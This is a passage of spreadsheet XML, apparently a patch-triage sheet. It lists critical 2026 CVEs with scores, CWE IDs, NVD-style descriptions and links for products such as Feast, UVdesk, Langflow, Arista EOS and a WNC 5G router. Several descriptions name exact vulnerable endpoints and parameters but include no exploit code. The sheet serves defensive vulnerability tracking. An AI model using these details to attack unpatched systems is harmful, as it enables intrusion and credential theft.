          <t>CVE-2026-92787</t>
        </is>
      </c>
      <c r="D65" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E65" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F65" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G65" s="5" t="inlineStr"/>
      <c r="H65" s="5" t="inlineStr"/>
      <c r="I65" s="5" t="inlineStr"/>
      <c r="J65" s="5" t="inlineStr"/>
      <c r="K65" s="5" t="inlineStr"/>
      <c r="L65" s="5" t="inlineStr"/>
      <c r="M65" s="5" t="inlineStr"/>
      <c r="N65" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O65" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P65" s="5" t="inlineStr"/>
      <c r="Q65" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="R65" s="5" t="inlineStr">
        <is>
          <t>Feast through 0.66.0 fails to verify JWT token signatures before establishing user identity, allowing attackers to bypass all role-based access control by presenting an unverified token with a hardcoded claim value. Attackers can obtain trusted internal identity and gain unchecked read and write access to all entities, feature views, data sources, and permission policies on the server.</t>
        </is>
      </c>
      <c r="S65" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92787</t>
        </is>
      </c>
    </row>
    <row r="66">
      <c r="A66" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B66" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C66" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92805</t>
        </is>
      </c>
      <c r="D66" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E66" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F66" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G66" s="5" t="inlineStr"/>
      <c r="H66" s="5" t="inlineStr"/>
      <c r="I66" s="5" t="inlineStr"/>
      <c r="J66" s="5" t="inlineStr"/>
      <c r="K66" s="5" t="inlineStr"/>
      <c r="L66" s="5" t="inlineStr"/>
      <c r="M66" s="5" t="inlineStr"/>
      <c r="N66" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O66" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P66" s="5" t="inlineStr"/>
      <c r="Q66" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R66" s="5" t="inlineStr">
        <is>
          <t>UVdesk Community Skeleton through 1.1.8 fails to authenticate or validate installation state on wizard endpoints in ConfigureHelpdesk controller actions. Unauthenticated attackers can repoint the database and create super administrator accounts by submitting crafted requests to wizard endpoints, gaining full control of the instance.</t>
        </is>
      </c>
      <c r="S66" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92805</t>
        </is>
      </c>
    </row>
    <row r="67">
      <c r="A67" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B67" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C67" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12944</t>
        </is>
      </c>
      <c r="D67" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E67" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F67" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G67" s="5" t="inlineStr"/>
      <c r="H67" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I67" s="5" t="inlineStr"/>
      <c r="J67" s="5" t="inlineStr">
        <is>
          <t>docker, postgresql, redis</t>
        </is>
      </c>
      <c r="K67" s="5" t="inlineStr"/>
      <c r="L67" s="5" t="inlineStr"/>
      <c r="M67" s="5" t="inlineStr"/>
      <c r="N67" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O67" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P67" s="5" t="inlineStr"/>
      <c r="Q67" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R67" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.10.0 can allow attackers to execute arbitrary Python code with root privileges (UID=0) on the Langflow server by submitting components containing socket or urllib imports. This enables: (1) AWS credential theft via IMDSv1 SSRF with full IAM role permissions, (2) arbitrary file exfiltration from the container filesystem, and (3) lateral movement to internal services (PostgreSQL, Redis) within the Docker network. The scanner incorrectly returns "validated": true, providing a false security signal.</t>
        </is>
      </c>
      <c r="S67" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12944</t>
        </is>
      </c>
    </row>
    <row r="68">
      <c r="A68" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B68" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C68" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20331</t>
        </is>
      </c>
      <c r="D68" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E68" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F68" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G68" s="5" t="inlineStr"/>
      <c r="H68" s="5" t="inlineStr"/>
      <c r="I68" s="5" t="inlineStr"/>
      <c r="J68" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K68" s="5" t="inlineStr"/>
      <c r="L68" s="5" t="inlineStr"/>
      <c r="M68" s="5" t="inlineStr"/>
      <c r="N68" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O68" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P68" s="5" t="inlineStr"/>
      <c r="Q68" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="R68" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Secure Adaptive Security Appliance Software, Cisco Secure Firewall Threat Defense Software and Cisco Secure Firewall Management Center Software engineering team has conducted a comprehensive internal security review. This review resulted in a software hardening release that addresses multiple internally discovered vulnerabilities. &amp;nbsp;
The vulnerabilities tracked by CVE-2026-20331 are related to the failure of protection mechanisms issues that are grouped under the Common Weakness Enumeration (CWE) Pillar CWE-693.</t>
        </is>
      </c>
      <c r="S68" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20331</t>
        </is>
      </c>
    </row>
    <row r="69">
      <c r="A69" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B69" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C69" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82107</t>
        </is>
      </c>
      <c r="D69" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E69" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F69" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G69" s="5" t="inlineStr"/>
      <c r="H69" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I69" s="5" t="inlineStr"/>
      <c r="J69" s="5" t="inlineStr"/>
      <c r="K69" s="5" t="inlineStr">
        <is>
          <t>ibm:datastage_on_cloud_pak_for_data</t>
        </is>
      </c>
      <c r="L69" s="5" t="inlineStr"/>
      <c r="M69" s="5" t="inlineStr"/>
      <c r="N69" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O69" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P69" s="5" t="inlineStr"/>
      <c r="Q69" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R69" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to obtain sensitive information and bypass security restrictions due to improper authentication.</t>
        </is>
      </c>
      <c r="S69" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82107</t>
        </is>
      </c>
    </row>
    <row r="70">
      <c r="A70" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B70" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C70" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92716</t>
        </is>
      </c>
      <c r="D70" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E70" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F70" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G70" s="5" t="inlineStr"/>
      <c r="H70" s="5" t="inlineStr"/>
      <c r="I70" s="5" t="inlineStr"/>
      <c r="J70" s="5" t="inlineStr"/>
      <c r="K70" s="5" t="inlineStr"/>
      <c r="L70" s="5" t="inlineStr"/>
      <c r="M70" s="5" t="inlineStr"/>
      <c r="N70" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O70" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P70" s="5" t="inlineStr"/>
      <c r="Q70" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R70" s="5" t="inlineStr">
        <is>
          <t>Shuffle through 2.2.1 contains a cross-tenant privilege escalation vulnerability in the HandleApiGeneration endpoint that allows administrators to reset and read API keys of non-administrator users in other organizations. Attackers with admin privileges in one organization can supply arbitrary user IDs to generate valid API keys for users in different organizations, enabling account takeover across tenant boundaries.</t>
        </is>
      </c>
      <c r="S70" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92716</t>
        </is>
      </c>
    </row>
    <row r="71">
      <c r="A71" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B71" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C71" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15640</t>
        </is>
      </c>
      <c r="D71" s="5" t="n">
        <v>9.5</v>
      </c>
      <c r="E71" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F71" s="5" t="inlineStr">
        <is>
          <t>1443cd92-d354-46d2-9290-d812316ca43a</t>
        </is>
      </c>
      <c r="G71" s="5" t="inlineStr"/>
      <c r="H71" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I71" s="5" t="inlineStr"/>
      <c r="J71" s="5" t="inlineStr"/>
      <c r="K71" s="5" t="inlineStr"/>
      <c r="L71" s="5" t="inlineStr"/>
      <c r="M71" s="5" t="inlineStr"/>
      <c r="N71" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O71" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P71" s="5" t="inlineStr"/>
      <c r="Q71" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="R71" s="5" t="inlineStr">
        <is>
          <t>Under certain conditions a valid SAML IdP response may be used to impersonate another Secret Server user.</t>
        </is>
      </c>
      <c r="S71" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15640</t>
        </is>
      </c>
    </row>
    <row r="72">
      <c r="A72" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B72" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C72" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73453</t>
        </is>
      </c>
      <c r="D72" s="5" t="n">
        <v>9.5</v>
      </c>
      <c r="E72" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F72" s="5" t="inlineStr">
        <is>
          <t>psirt@arista.com</t>
        </is>
      </c>
      <c r="G72" s="5" t="inlineStr"/>
      <c r="H72" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I72" s="5" t="inlineStr"/>
      <c r="J72" s="5" t="inlineStr"/>
      <c r="K72" s="5" t="inlineStr"/>
      <c r="L72" s="5" t="inlineStr"/>
      <c r="M72" s="5" t="inlineStr"/>
      <c r="N72" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O72" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P72" s="5" t="inlineStr"/>
      <c r="Q72" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R72" s="5" t="inlineStr">
        <is>
          <t>An unauthenticated P4Runtime (Programming Protocol-Independent Packet Processors Runtime) client can achieve arbitrary code execution under certain conditions on affected platforms running Arista EOS configured with P4Runtime. P4Runtime is disabled by default in Arista EOS. By crafting a malicious packet during the initiation of a P4Runtime session, an attacker can obtain complete administrative control over the compromised switch.
This issue was discovered internally by Arista, and the company is not aware of any malicious exploitation of this vulnerability in customer networks.</t>
        </is>
      </c>
      <c r="S72" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73453</t>
        </is>
      </c>
    </row>
    <row r="73">
      <c r="A73" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B73" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C73" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77411</t>
        </is>
      </c>
      <c r="D73" s="5" t="n">
        <v>9.5</v>
      </c>
      <c r="E73" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F73" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G73" s="5" t="inlineStr"/>
      <c r="H73" s="5" t="inlineStr"/>
      <c r="I73" s="5" t="inlineStr"/>
      <c r="J73" s="5" t="inlineStr"/>
      <c r="K73" s="5" t="inlineStr"/>
      <c r="L73" s="5" t="inlineStr"/>
      <c r="M73" s="5" t="inlineStr"/>
      <c r="N73" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O73" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P73" s="5" t="inlineStr"/>
      <c r="Q73" s="5" t="inlineStr">
        <is>
          <t>CWE-754</t>
        </is>
      </c>
      <c r="R73" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ amqp091-go is a Go AMQP 0.9.1 client. Prior to 1.13.0, readLongstr in read.go returns an empty string and a nil error when a declared AMQP longstr length exceeds 0x7FFFFFFF instead of returning ErrSyntax. The function leaves the declared field bytes unread, while readTable treats the operation as successful and continues parsing from the wrong offset. A malicious or compromised broker can provide an oversized longstr in a table field and desynchronize subsequent AMQP parsing, causing attacker-controlled trailing bytes to be interpreted as later fields or frames and disrupting connection integrity and availability. This issue is fixed in version 1.13.0.</t>
        </is>
      </c>
      <c r="S73" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77411</t>
        </is>
      </c>
    </row>
    <row r="74">
      <c r="A74" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B74" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C74" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58146</t>
        </is>
      </c>
      <c r="D74" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E74" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F74" s="5" t="inlineStr">
        <is>
          <t>cvd@cert.pl</t>
        </is>
      </c>
      <c r="G74" s="5" t="inlineStr"/>
      <c r="H74" s="5" t="inlineStr"/>
      <c r="I74" s="5" t="inlineStr"/>
      <c r="J74" s="5" t="inlineStr"/>
      <c r="K74" s="5" t="inlineStr"/>
      <c r="L74" s="5" t="inlineStr"/>
      <c r="M74" s="5" t="inlineStr"/>
      <c r="N74" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O74" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P74" s="5" t="inlineStr"/>
      <c r="Q74" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R74" s="5" t="inlineStr">
        <is>
          <t>WNC T-Mobile 5G Box IDU router is vulnerable to OS command injection vulnerability. The vulnerability exists within the /cgi-bin/portal.cgi endpoint, specifically through the cli_cookie POST parameter. The cli_cookie parameter value is directly concatenated into a find command string without proper sanitization. This allows a remote, unauthenticated attacker to inject and execute arbitrary shell commands as root on the underlying operating system.
This issue has been fixed in firmware version 1.1.0.651412</t>
        </is>
      </c>
      <c r="S74" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58146</t>
        </is>
      </c>
    </row>
    <row r="75">
      <c r="A75" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B75" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C75" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73447</t>
        </is>
      </c>
      <c r="D75" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E75" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F75" s="5" t="inlineStr">
        <is>
          <t>psirt@arista.com</t>
        </is>
      </c>
      <c r="G75" s="5" t="inlineStr"/>
      <c r="H75" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I75" s="5" t="inlineStr"/>
      <c r="J75" s="5" t="inlineStr"/>
      <c r="K75" s="5" t="inlineStr"/>
      <c r="L75" s="5" t="inlineStr"/>
      <c r="M75" s="5" t="inlineStr"/>
      <c r="N75" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O75" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P75" s="5" t="inlineStr"/>
      <c r="Q75" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R75" s="5" t="inlineStr">
        <is>
          <t>A privileged attacker can exploit certain operation to execute arbitrary commands with root privileges, leading to full device compromise. An authenticated user can exploit gRPC Network Security Interface (gNSI) Certz service on Arista EOS-based products to escalate privileges and execute arbitrary OS commands via a crafted Certz Rotate request. The Bootz service is also affected.</t>
        </is>
      </c>
      <c r="S75" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73447</t>
        </is>
      </c>
    </row>
    <row r="76">
      <c r="A76" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B76" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C76" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73461</t>
        </is>
      </c>
      <c r="D76" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E76" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F76" s="5" t="inlineStr">
        <is>
          <t>psirt@arista.com</t>
        </is>
      </c>
      <c r="G76" s="5" t="inlineStr"/>
      <c r="H76" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I76" s="5" t="inlineStr"/>
      <c r="J76" s="5" t="inlineStr"/>
      <c r="K76" s="5" t="inlineStr"/>
      <c r="L76" s="5" t="inlineStr"/>
      <c r="M76" s="5" t="inlineStr"/>
      <c r="N76" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O76" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P76" s="5" t="inlineStr"/>
      <c r="Q76" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="R76" s="5" t="inlineStr">
        <is>
          <t>On affected EOS platforms with AAA-based gRPC authorization enabled for OpenConfig, gRPC requests of an authenticated user to OpenConfig may use the wrong privilege level, resulting in an authorization using the wrong AAA method list. This does not impact non-gRPC OpenConfig requests such as NETCONF.</t>
        </is>
      </c>
      <c r="S76" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73461</t>
        </is>
      </c>
    </row>
    <row r="77">
      <c r="A77" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B77" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C77" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77405</t>
        </is>
      </c>
      <c r="D77" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E77" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F77" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G77" s="5" t="inlineStr"/>
      <c r="H77" s="5" t="inlineStr"/>
      <c r="I77" s="5" t="inlineStr"/>
      <c r="J77" s="5" t="inlineStr"/>
      <c r="K77" s="5" t="inlineStr"/>
      <c r="L77" s="5" t="inlineStr"/>
      <c r="M77" s="5" t="inlineStr"/>
      <c r="N77" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O77" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P77" s="5" t="inlineStr"/>
      <c r="Q77" s="5" t="inlineStr">
        <is>
          <t>CWE-326</t>
        </is>
      </c>
      <c r="R77" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ amqp091-go is a Go AMQP 0.9.1 client. Prior to 1.13.0, tlsConfigFromURI in uri.go creates tls.Config values without setting MinVersion to tls.VersionTLS12. Builds using a Go runtime whose default permits TLS 1.0 or TLS 1.1 can therefore negotiate an obsolete protocol version when connecting through an amqps URI. A network attacker able to influence TLS negotiation with such a legacy build may weaken transport protection for AMQP messages and credentials. This issue is fixed in version 1.13.0.</t>
        </is>
      </c>
      <c r="S77" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77405</t>
        </is>
      </c>
    </row>
    <row r="78">
      <c r="A78" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B78" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C78" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81046</t>
        </is>
      </c>
      <c r="D78" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E78" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F78" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G78" s="5" t="inlineStr"/>
      <c r="H78" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I78" s="5" t="inlineStr"/>
      <c r="J78" s="5" t="inlineStr"/>
      <c r="K78" s="5" t="inlineStr">
        <is>
          <t>dell:latitude_3330, dell:latitude_3420, dell:latitude_3440, dell:latitude_3450, dell:latitude_5440, dell:latitude_5450, dell:latitude_5520, dell:latitude_5530, dell:latitude_5540, dell:latitude_5550</t>
        </is>
      </c>
      <c r="L78" s="5" t="inlineStr"/>
      <c r="M78" s="5" t="inlineStr"/>
      <c r="N78" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O78" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P78" s="5" t="inlineStr"/>
      <c r="Q78" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R78" s="5" t="inlineStr">
        <is>
          <t>Dell ThinOS 10, versions prior to 2605_10.2616, contain a Protection Mechanism Failure vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Arbitrary Code Execution within the application context.</t>
        </is>
      </c>
      <c r="S78" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81046</t>
        </is>
      </c>
    </row>
    <row r="79">
      <c r="A79" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B79" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C79" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85192</t>
        </is>
      </c>
      <c r="D79" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E79" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F79" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G79" s="5" t="inlineStr"/>
      <c r="H79" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I79" s="5" t="inlineStr"/>
      <c r="J79" s="5" t="inlineStr"/>
      <c r="K79" s="5" t="inlineStr"/>
      <c r="L79" s="5" t="inlineStr"/>
      <c r="M79" s="5" t="inlineStr"/>
      <c r="N79" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O79" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P79" s="5" t="inlineStr"/>
      <c r="Q79" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R79" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - regularlabs.com - Authenticated, privileged remote code execution in Conditional Content extension for Joomla &lt; 8.0.0 - Conditional Content Pro accepts inline PHP Condition Rules in article syntax. In affected versions, the PHP is passed to the Conditions evaluator without checking who authored the article. Joomla's normal Author text filter preserves the syntax, so publishing the article causes the code to run as the web-server process.</t>
        </is>
      </c>
      <c r="S79" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85192</t>
        </is>
      </c>
    </row>
    <row r="80">
      <c r="A80" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B80" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C80" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90680</t>
        </is>
      </c>
      <c r="D80" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E80" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F80" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G80" s="5" t="inlineStr"/>
      <c r="H80" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I80" s="5" t="inlineStr"/>
      <c r="J80" s="5" t="inlineStr"/>
      <c r="K80" s="5" t="inlineStr"/>
      <c r="L80" s="5" t="inlineStr"/>
      <c r="M80" s="5" t="inlineStr"/>
      <c r="N80" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O80" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P80" s="5" t="inlineStr"/>
      <c r="Q80" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-121</t>
        </is>
      </c>
      <c r="R80" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in D-Link DIR-823G 1.0.2B05_20181207. The impacted element is the function strcpy of the file /HNAP1/SetStaticRouteSettings of the component HNAP1. The manipulation of the argument PAddress/SubnetMask/Gateway results in stack-based buffer overflow. The attack can be launched remotely.</t>
        </is>
      </c>
      <c r="S80" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90680</t>
        </is>
      </c>
    </row>
    <row r="81">
      <c r="A81" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B81" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C81" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90937</t>
        </is>
      </c>
      <c r="D81" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E81" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F81" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G81" s="5" t="inlineStr"/>
      <c r="H81" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I81" s="5" t="inlineStr"/>
      <c r="J81" s="5" t="inlineStr">
        <is>
          <t>nginx</t>
        </is>
      </c>
      <c r="K81" s="5" t="inlineStr"/>
      <c r="L81" s="5" t="inlineStr"/>
      <c r="M81" s="5" t="inlineStr"/>
      <c r="N81" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O81" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P81" s="5" t="inlineStr"/>
